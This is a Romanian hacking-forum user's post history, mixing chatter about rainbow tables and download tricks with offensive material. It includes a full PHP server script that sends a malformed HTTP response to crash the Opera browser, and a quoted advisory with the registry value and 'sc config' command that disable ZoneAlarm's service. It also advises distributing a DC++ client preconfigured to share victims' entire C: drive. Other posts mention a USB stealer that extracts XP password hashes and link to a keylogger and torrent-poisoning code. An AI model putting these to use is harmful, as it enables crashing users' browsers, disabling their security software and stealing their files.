ICEBREAKER101010
-
Posts
743 -
Joined
-
Last visited
-
Days Won
18
Posts posted by ICEBREAKER101010
-
-
-
Si aici este codul sursa pentru "SeedFucker".
http://www.packetstormsecurity.org/0911-exploits/torrent-poisoning.txt
Dar din cate am vazut ,se pare ca e cam inutil.
-
Am impresia ca vrei sa faci pe "haceru" convertind vreun keylogger ceva.
-
Hooks the inputs of an HTML page and relays the keystrokes using iframes. Capable of replacing the target page with another from the same domain. Includes samples and a basic HTTP server written in C# configured to generate keystroke reports.
Browse Javascript Keylogger Files on SourceForge.net
Poate e util cuiva.
-
Si va ganditi sa le vindeti tabelele?
-
Bine spus Iceman99.Dar marea problema e ca toti se dau cunoscatori.
-
Sa-i dea careva ban lu asta.Ca de la o vreme cam multi nesimtiti sunt cu concursurile astea.
-
Ma refeream la versiunea de pangolin daca e full.
. Si fara crackuri din alea pline de troieni. -
Versiunea full ?
-
AnDrEwBoY[];137203']Ah begood' date=' si eu ce indrug de 3 ore?
Domnule ^^, raspunsul e simplu. Tu alegi metoda care o stii teoretic dar nu doresti sa aprofundezi un subiect. Asta se cheama dezvoltare : ti se propune o problema restrictionata si esti obligat sa o rezolvi printr-un anumit mod. Asa inveti, nu stand pe wikipedia si dand copy+paste la ce scrie despre rain` tables.
[/quote']Doar nu vroiai sa ma apuc sa povestesc aici ce inseamna rainbow tables.Vad ca tie iti place sa te complici.
-
Tocmai ca gandesc.De ce trebuie sa ma complic cand exista solutii mult mai simple ?Daca tu vrei sa iti pierzi timpul eu prefer sa rezolv problema asta mult mai repede decat tine iar in timpul in care tu iti bati capul cu gasirea unei solutii eu o sa fac altceva mai util in tot acest timp.
-
Pentru ca e mult mai simplu sa gasesti parola cu tabelele alea decat sa faci bruteforce sau sa cauti ceva md5 collision.
-
Bai nene tu ai impresia ca daca nu postez mereu pe aici inseamna ca sunt si incult?
A rainbow table is a lookup table offering a time-memory tradeoff used in recovering the plaintext password from a password hash generated by a hash function, often a cryptographic hash function. A common application is to make attacks against hashed passwords feasible. A salt is often employed with hashed passwords to make this attack more difficult, often infeasible.
Simplified rainbow table with 3 reduction functions
Rainbow tables are a refinement of an earlier, simpler algorithm by Martin Hellman[1] that used the inversion of hashes by looking up precomputed hash chains.
-
2 cuvinte: Rainbow Tables.
-
Si shellcodu ala o sa iti formateze hddu sau o sa iti stearga tot ce are extensia exe.Nu?
)Glumesc.Oricum trebuiesc verificate instructiunile alea in asm.
-
Hi,
During my (in)security research, I've discovered what appears initially to be
a design oversight and not necessarily a vulnerability, affecting ZoneAlarm
and various other security vendors. I've tested this on various XP platforms
successfully, please feel free to notify the vendor as you wish and/or to
publish whatever you feel appropriate under the circumstances.
NOTE:
Certain vendors (including ZoneAlarm) implement self-defence/self-protection
measures (see below for clarification), so as to prevent inadvertent &
malicious tampering with their software, and ultimately circumventing their
security controls. This extends to certain administrative privileges.
The following illustrates how one can easily disable ZoneAlarm's security for
whatever malevolent purposes. This "vector" so to speak, is merely "abusing" a
particular branch of the Windows registry, by registering this security
service as disabled. When "exploiting" this "vector" (administrative
privileges are assumed, see below for clarification) and the system rebooted,
this security service will be disarmed. That said, this particular "vector"
opens the door for "exploitation" via social means, thus unwitting victims may
not even realise that their security has been disabled, leaving them exposed
and unprotected.
Step-by-step illustration
How to easily circumvent ZoneAlarm's security, by disabling ZoneAlarm's
service (vsmon.exe) aka "TrueVector Internet Monitor". ZoneAlarm doesn't
protect this option, thus this is a good starting point for now.
i.e.
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSMON\000
0]
"CSConfigFlags"=dword:00000001
NOTE:
The next step is not required, especially seeing as ZoneAlarm's service
(vsmon.exe) was disabled in the previous step. However, should you also wish
to reconfigure ZoneAlarm's services, especially seeing as they are now
unprotected, to start manually or even disable completely;
i.e. Command Prompt
C:\> sc config vsmon start= disabled
The following helps to clarify the misconceptions and assumptions around
security software, especially in the context of administrator privileges. The
following project from 'Matousec' examines security software for Windows OS
that implement application-based security model.
Introduction:
Introduction - www.matousec.com
ion
http://www.matousec.com/projects/proactive-security-challenge/level.php?
num=1#tests
Methodology and rules:
Self-defense test: This category of tests include various attacks against the
security product itself. Termination tests are the first subtype of tests that
belongs in this category. These tests attempt to terminate or somehow damage
processes, or their parts, of the tested product. The termination test usually
succeeds if at least one of the target processes, or at least one of their
parts, was terminated or damaged. Besides processes and threads, the security
software usually relies on various files and registry entries. Tests that
attempt to remove, destroy or corrupt these critical objects for the security
product also belong to this category.
Administrator's or limited account:
Frequently asked questions - www.matousec.com
ministrators-limited-account
Cheers
Andrew Barkley
-
<?php
if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
else define('OS','nix');
if(!extension_loaded('php_sockets'))
{
if((OS == 'win') && (!@dl('php_sockets.dll')) ||
((OS == 'nix') && (!@dl('php_sockets.so'))))
die('fatal php_sockets.[dll/so] '.
'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");
}
/*Generated by my own fuzzer*/
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
'Transfer-Encoding: identity'."\r\n".
'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
'Server: moj zuy server'."\r\n".
'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
'Content-Location: file://C:/boot.ini'."\r\n".
'Vary:negotiate,accept-language,accept-charset'."\r\n".
'Tcn: choice'."\r\n".
'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
'Accept-Ranges: bytes'."\r\n".
'Cache-Control: max-age=0'."\r\n".
'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
'Content-Encoding: identity'."\r\n".
'Content-Length:9999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999666 '."\r\n".
'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
'Keep-Alive: timeout=15, max=300'."\r\n".
'Connection: keep-alive'."\r\n".
'Content-Type: text/html; charset=iso-8859-2'."\r\n".
'Age: 1'."\r\n".
'Allow: GET,HEAD'."\r\n".
'Content-Disposition: inline'."\r\n".
'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
'Warning: 199 Miscellaneous warning'."\r\n".
'Trailer: Max-Forwards'."\r\n".
'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
'Content-Range: bytes 21010-47021/47022'."\r\n".
'Content-Language: pl'."\r\n\r\n".
'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
$buster = $argc - 1;
//use -port 666 if you need
for($i = 0; $i<=$buster; $i+=2)
{
if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
else $PORT = 81;
}
if(!($SOCKET = socket_create_listen($PORT)))
die('fatal socket init failed'."\r\n");
socket_set_option($SOCKET,SOL_SOCKET,
SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
echo('SOCKET READY AT PORT '.$PORT."\r\n".
'Now connect here via opera'."\r\n");
if($CONNECT = socket_accept($SOCKET))
{
$recv_buffer = null;
echo('Connection ok '."\r\n");
if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
{
if(!@socket_write($CONNECT,$EVIL))
{
socket_close($CONNECT);
socket_close($SOCKET);
die('I cant send payload !'."\r\n");
}
}
else echo('Something wrong with client side'."\r\n");
usleep(120000);
socket_close($CONNECT);
socket_close($SOCKET);
}
echo('OK ya browser must be death now'."\r\n".
'Have a nice day lol'."\r\n");
?>
-
vreau sa particip la raid
//utilizator cu prea putine posturi//
-
Nu mai merge ,ce naiba nu intelegeti.Am ridicat apacheul si am mutat folderul sms in var/www/
Imi apare pagina unde bag numaru de telefon si numarul de incercari.Am bagat asa cum trebuie si nu trimite nici un sms.Am incercat pe propriul numar.Cu toate ca nu imi da nici o eroare,asa cum imi dadea la inceput pentru ca nu aveam extensiile curl pentru php.O zi buna baieti.
-
Imi da o eroare cand execut scriptu
Fatal error: Call to undefined function curl_init() in /var/www/doit.php on line 35
Poate e din cauza ca folosesc backtrack 4 final si firefox 3.0 ?
icebreaker101010@bt:~# curl --version
curl 7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8
Protocols: tftp ftp telnet dict ldap ldaps http file https ftps
Features: GSS-Negotiate IDN IPv6 Largefile NTLM SSL libz
-
Imi da o eroare cand execut scriptu
Fatal error: Call to undefined function curl_init() in /var/www/doit.php on line 35
Poate e din cauza ca folosesc backtrack 4 final si firefox 3.0 ?
S-a rezolvat
apt-get install php-curl "extensiile curl pentru php"
Nu mai da eroare dar se pare ca nu mai functioneaza smecheria.
-
Cand spun timp de asteptare,ma refer la timpul acela in care astepti sa iti genereze linkul pentru download.Pentru asta avem nevoie de un browser(recomand firefox) si Jdownloader(this tool rulz).Cautatzi un link valid de rapidshare.Alegetzi free user.Si uitativa in codul sursa al paginii(ctrl+).Acolo cautati:<form name="dlf" action=
Guess what?Dupa egal e linkul nostru de download fara waiting time.Merg si cele de mai jos unde scrie "mirror".Copiatzi unu din ele si deschide-tzi Jdownloader.Adaugatzi-l acolo and enjoy dowloading.No wait time.
Nota:linkurile cu timp de asteptare pana in 30 de secunde ,merg downloadate fara Jdownloader.Cele cu timp de asteptare de la 80 de secunde in sus,trebuiesc downloadate cu Jdownloader.Enjoy downloading.
-
Oricum pwdump6 este pentru hahsu parolei de XP.Nu vad la ce iti trebuie asa ceva.Eu mi-am imbunatatit usb stealeru cu asa ceva .Adica l-am facut sa imi extraga si hashu de XP.Si daca hiar rei ceva tare iti faci propriu pachet de instalare care sa contzina odc plus alte fisiere.
. Si il pui pe un host.Unde e accesibil pentru toata lumea.Si crede-ma ca multi iau odc sau orice alt client peer to peer dupa orice site.Nu neaparat dupa siteul programului.Si ar mai fi si pe odc.Il dai share.Si sunt o groaza de lenesi care il vor lua. -
cauta un fisier numit DCPlusPlus.xml
dupa aceea il scrie:
<?xml version="1.0" encoding="windows-1252"?>
<DCPlusPlus>
<Settings>
.
.
.
.
</Settings>
<share>
<Directory>C:</Directory>
</Share>
</DCPlusPlus>
Chestia asta se poate modifica in visual basic.Adica faci un program care iti modifica fisieru in momentu cand l-ai executat.Sau cred ca mai bine il pui intr-un odc gata setat pentru puturosi ,astfel o sa iti cada o gramada in plasa.Asa e cand ti-e lene.
)
Metasploit 3.3 portable
in Programe hacking
Posted
Toata lumea de pe acest forum cred ca stie la ce se foloseste Metasploit. 4shared.com - online file sharing and storage - download MSF 3.3p v4 (Full svn r7553).rar Enjoy!